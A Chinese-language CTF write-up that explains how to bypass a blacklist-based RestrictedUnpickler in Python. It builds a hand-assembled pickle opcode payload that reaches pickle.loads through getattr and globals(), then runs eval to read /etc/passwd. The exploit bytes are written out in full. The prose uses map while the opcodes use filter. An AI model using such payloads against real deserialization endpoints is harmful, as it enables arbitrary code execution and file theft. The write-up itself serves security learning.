上周跑模型的间隙,看到一个关于 Python Pickle 反序列化的 CTF 题,和以往见到的不太一样,感觉很有意思,遂打算研究一下。
0x00 Pickle 反序列化
我们知道,当我们控制了如 `pickle.loads`等序列化数据的输入接口时,我们可以通过构造恶意的 Payload 来达到任意代码执行的效果。这是因为, `pickle` 库在反序列化(unpickling)的过程中,默认会导入 Payload 中找到的任意类或者函数对象。所以,Python 的开发者也一直警告大家,不要轻易用 `pickle` 来反序列化没有经过数据清洗的输入数据。同时,还推荐开发者通过实现自己的 `Unpickler`,来限制反序列化过程中能够 import 的类或函数,参考:https://docs.python.org/3.7/library/pickle.html#restricting-globals 。
0x01 RestrictedUnpickler
回到题目中。题目中 pickle “沙箱” 的大致逻辑如下:
import pickle import io import builtins class RestrictedUnpickler(pickle.Unpickler): blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'} def find_class(self, module, name): # Only allow safe classes from builtins. if module == "builtins" and name not in self.blacklist: return getattr(builtins, name) # Forbid everything else. raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)) def restricted_loads(s): """Helper function analogous to pickle.loads().""" return RestrictedUnpickler(io.BytesIO(s)).load()
可以看到,这个题是基于 Python 文档中的 example 来修改的,通过添加“黑名单”的方式来限制 unpickling 过程中的可导入类: 基本上禁用了 builtins 中的所有能直接执行代码的内置函数,同时还限制了导入类或者函数所在的模块必须是 `builtins`。可是,如果不通过这些内置函数,我们就不能执行代码了么?
翻翻文档,快速扫一眼 Python 的内置函数:
除去被禁用的函数,一眼看去还能凑合使用的是 `map` 和 `filter` 这两个接受函数做参数的内置函数。
在尝试了多次之后发现,即使我们能传入函数参数,我们也只能执行 builtins 中仅有的几个函数,并不能执行任意代码。就在纠结万分的时候,我猛然发现,还有一个被忽略的点, 那就是上下文早已导入的 `pickle` 模块。我们是否可以想办法调用 `pickle.loads`呢?这样不就直接绕过了原有的“沙箱” ?
0x02 Pickle Protocol
查看一下 pickle 序列化协议,当前环境下使用的是 Python3,所以我们来看看当前的 Protocol 3:
import pickletools import prettytable opcode_table = prettytable.PrettyTable() opcode_table.field_names = ['Name', 'Code', 'Docs'] for opcode in pickletools.opcodes: opcode_table.add_row([opcode.name, opcode.code, opcode.doc.splitlines()[0]]) print(opcode_table)
输出 `opcode` 表:
+------------------+------+-----------------------------------------------------------------+ | Name | Code | Docs | +------------------+------+-----------------------------------------------------------------+ | INT | I | Push an integer or bool. | | BININT | J | Push a four-byte signed integer. | | BININT1 | K | Push a one-byte unsigned integer. | | BININT2 | M | Push a two-byte unsigned integer. | | LONG | L | Push a long integer. | | LONG1 | \x8a | Long integer using one-byte length. | | LONG4 | \x8b | Long integer using found-byte length. | | STRING | S | Push a Python string object. | | SHORT_BINSTRING | U | Push a Python string object. | | BINBYTES | B | Push a Python bytes object. | | SHORT_BINBYTES | C | Push a Python bytes object. | | BINBYTES8 | \x8e | Push a Python bytes object. | | NONE | N | Push None on the stack. | | NEWTRUE | \x88 | Push True onto the stack. | | NEWFALSE | \x89 | Push False onto the stack. | | UNICODE | V | Push a Python Unicode string object. | | SHORT_BINUNICODE | \x8c | Push a Python Unicode string object. | | BINUNICODE | X | Push a Python Unicode string object. | | BINUNICODE8 | \x8d | Push a Python Unicode string object. | | FLOAT | F | Newline-terminated decimal float literal. | | BINFLOAT | G | Float stored in binary form, with 8 bytes of data. | | EMPTY_LIST | ] | Push an empty list. | | APPEND | a | Append an object to a list. | | APPENDS | e | Extend a list by a slice of stack objects. | | LIST | l | Build a list out of the topmost stack slice, after markobject. | | EMPTY_TUPLE | ) | Push an empty tuple. | | TUPLE | t | Build a tuple out of the topmost stack slice, after markobject. | | TUPLE1 | \x85 | Build a one-tuple out of the topmost item on the stack. | | TUPLE2 | \x86 | Build a two-tuple out of the top two items on the stack. | | TUPLE3 | \x87 | Build a three-tuple out of the top three items on the stack. | | EMPTY_DICT | } | Push an empty dict. | | DICT | d | Build a dict out of the topmost stack slice, after markobject. | | SETITEM | s | Add a key+value pair to an existing dict. | | SETITEMS | u | Add an arbitrary number of key+value pairs to an existing dict. | | EMPTY_SET | \x8f | Push an empty set. | | ADDITEMS | \x90 | Add an arbitrary number of items to an existing set. | | FROZENSET | \x91 | Build a frozenset out of the topmost slice, after markobject. | | POP | 0 | Discard the top stack item, shrinking the stack by one item. | | DUP | 2 | Push the top stack item onto the stack again, duplicating it. | | MARK | ( | Push markobject onto the stack. | | POP_MARK | 1 | Pop all the stack objects at and above the topmost markobject. | | GET | g | Read an object from the memo and push it on the stack. | | BINGET | h | Read an object from the memo and push it on the stack. | | LONG_BINGET | j | Read an object from the memo and push it on the stack. | | PUT | p | Store the stack top into the memo. The stack is not popped. | | BINPUT | q | Store the stack top into the memo. The stack is not popped. | | LONG_BINPUT | r | Store the stack top into the memo. The stack is not popped. | | MEMOIZE | \x94 | Store the stack top into the memo. The stack is not popped. | | EXT1 | \x82 | Extension code. | | EXT2 | \x83 | Extension code. | | EXT4 | \x84 | Extension code. | | GLOBAL | c | Push a global object (module.attr) on the stack. | | STACK_GLOBAL | \x93 | Push a global object (module.attr) on the stack. | | REDUCE | R | Push an object built from a callable and an argument tuple. | | BUILD | b | Finish building an object, via __setstate__ or dict update. | | INST | i | Build a class instance. | | OBJ | o | Build a class instance. | | NEWOBJ | \x81 | Build an object instance. | | NEWOBJ_EX | \x92 | Build an object instance. | | PROTO | \x80 | Protocol version indicator. | | STOP | . | Stop the unpickling machine. | | FRAME | \x95 | Indicate the beginning of a new frame. | | PERSID | P | Push an object identified by a persistent ID. | | BINPERSID | Q | Push an object identified by a persistent ID. | +------------------+------+-----------------------------------------------------------------
对照此表,我们来看一个例子:
class Payloads(object): def __reduce__(self): return (eval, ("print(1)", )) payload = pickle.dumps(Payloads()) print(payload) print(dis(payload))
输出如下:
b'\x80\x03cbuiltins\neval\nq\x00X\x08\x00\x00\x00print(1)q\x01\x85q\x02Rq\x03.' 0: \x80 PROTO 3 <= 协议版本号 3 2: c GLOBAL 'builtins eval' 17: q BINPUT 0 19: X BINUNICODE 'print(1)' <= length=\x08\x00\x00\x00 32: q BINPUT 1 34: \x85 TUPLE1 35: q BINPUT 2 37: R REDUCE <= 构建一个函数调用 38: q BINPUT 3 40: . STOP
通过以上例子,我们使用 builtins 仅有的几个函数来构造一个间接调用 `pickle.loads` 的 Payload:
list(map(getattr(getattr(dict ,'get')(globals(), 'pickle'), 'loads'), ('PAYLOAD',)))
构造的 `opcode` 如下:
payload = b'\x80\x03' payload += b'cbuiltins\nlist\nq\x00' # list payload += b'cbuiltins\nfilter\nq\x01' # filter payload += b'cbuiltins\ngetattr\nq\x02' # getattr payload += b'cbuiltins\ngetattr\nq\x03' # getattr payload += b'cbuiltins\ndict\nq\x04' # dict payload += b'X\x03\x00\x00\x00getq\x05' # 'get' payload += b'\x86q\x06' # (dict, 'get') payload += b'Rq\x07' # RUN getattr(dict, 'get') payload += b'cbuiltins\nglobals\nq\x08' # globals payload += b')q\x09' # () payload += b'Rq\x0a' # RUN globals() payload += b'X\x06\x00\x00\x00pickleq\x0b' # 'pickle' payload += b'\x86q\x0c' # (globals(), 'pickle') payload += b'Rq\x0d' # get(globals(), 'pickle') payload += b'X\x05\x00\x00\x00loadsq\x0e' # ‘loads' payload += b'\x86q\x0f' # (pickle, 'loads') payload += b'Rq\x10' # getattr(pickle, 'loads) payload += b'B' payload += (len(inner_payload)).to_bytes(4, byteorder='little') payload += inner_payload payload += b'\x85q\x11' # (inner_payloads,) payload += b'\x86q\x12' # (loads, (inner_payload,)) payload += b'Rq\x13' # map(loads, (inner_payload,)) payload += b'\x85q\x14' # TUPLE1 payload += b'Rq\x15' # RUN list(...) payload += b'.'
我们先构造一个内嵌的 payload:
import pickle class InnerPayload(object): def __reduce__(self): return ( eval, ("print(open('/etc/passwd').read())",) ) inner_payload = pickle.dumps(InnerPayload()) print(inner_payload) # b"\x80\x03cbuiltins\neval\nq\x00X!\x00\x00\x00print(open('/etc/passwd').read())q\x01\x85q\x02Rq\x03."
结合两个 payload,我们来试一试:
可以看到,我们的 Payload 成功执行并读取了`/etc/passwd`。同时也可以看到,`find_class` 导入的函数全部满足条件:`getattr`、`list`、`filter`、`globals`、`dict`。
0x03 小结
当前只能想到这样一种绕过,不知道是否还有其他的方式,只能坐等 dalao 们放 writeup了。虽然直接构造`opcode`难度不是很大,但是一个不小心也导致调试过程中好几次栈没有平衡。
以此也可以看出,在`pickle`反序列化过程中只禁用危险函数也是不够的,还是得谨慎使用该接口。
0x04 References
1. https://github.com/phith0n/code-breaking/blob/master/2018/picklecode/web/core/serializer.py
2. https://docs.python.org/3.7/library/pickle.html#restricting-globals